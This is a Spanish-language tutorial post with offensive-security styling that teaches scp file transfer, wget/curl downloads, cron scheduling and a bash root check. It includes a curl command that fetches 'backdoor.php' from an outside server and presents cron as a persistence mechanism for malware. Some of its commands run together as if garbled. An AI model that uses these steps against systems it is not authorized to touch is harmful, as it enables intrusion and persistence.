// MISIÓN: Operations & Persistence
// TARGET: Data Transfer & Automation
// STATUS: Deploying Payloads
La administración manual no escala.
La diferencia entre un usuario y un SysAdmin (o un atacante eficiente) es la capacidad de automatizar tareas y mover datos sigilosamente.
En esta última entrega de la serie inicial 0x03, dominaremos la transferencia y la persistencia.
0x00. Logística de Datos (In/Out)
Necesitas herramientas para subir scripts o bajar logs de evidencia. Recuerda que cambiamos el puerto SSH al 2222 en el post 0x01.
SCP (Secure Copy)
Desde tu máquina local hacia el servidor (Upload):
scp -P 2222 payload.sh usuario@target:/tmp/
Desde el servidor hacia local (Exfiltración/Download):
scp -P 2222 usuario@target:/var/log/auth.log .
Wget & Curl (Living off the Land)
Si estás dentro del servidor y necesitas bajar herramientas desde una URL:
wget -O linpeas.sh https://github.com/.../linpeas.shcurl -O https://miservidor.com/backdoor.php
0x01. Automatización y Persistencia (Cron)
Cron es el reloj del sistema que ejecuta tareas programadas.
Es el lugar favorito para backups legítimos... y para persistencia de malware.
crontab -e Sintaxis: m h dom mon dow comando
#Ejemplo: Heartbeat cada minuto * * * * * date >> /home/usuario/latido.txt
Ejemplo: Backup diario a las 03:30 AM 30 03 * * * /home/usuario/scripts/backup.sh 2>&1
0x02. Bash Scripting: Ops Code
Un script básico para verificar si somos root antes de ejecutar una acción crítica. Estructura esencial:
#!/bin/bashVariables
TARGET=“192.168.1.10” USER=$(whoami)
echo ”[*] Iniciando Ops como: $USER”
Condicional de Privilegios
if [ $(id -u) -eq 0 ]; then echo ”[+] Eres Root. Ejecutando payload…”
Acciones privilegiadas aquí
else echo ”[-] Acceso denegado. Se requieren privilegios.” exit 1 fi
No olvides dar permisos de ejecución: chmod +x script.sh.
"End of Initial Series"
[EOF]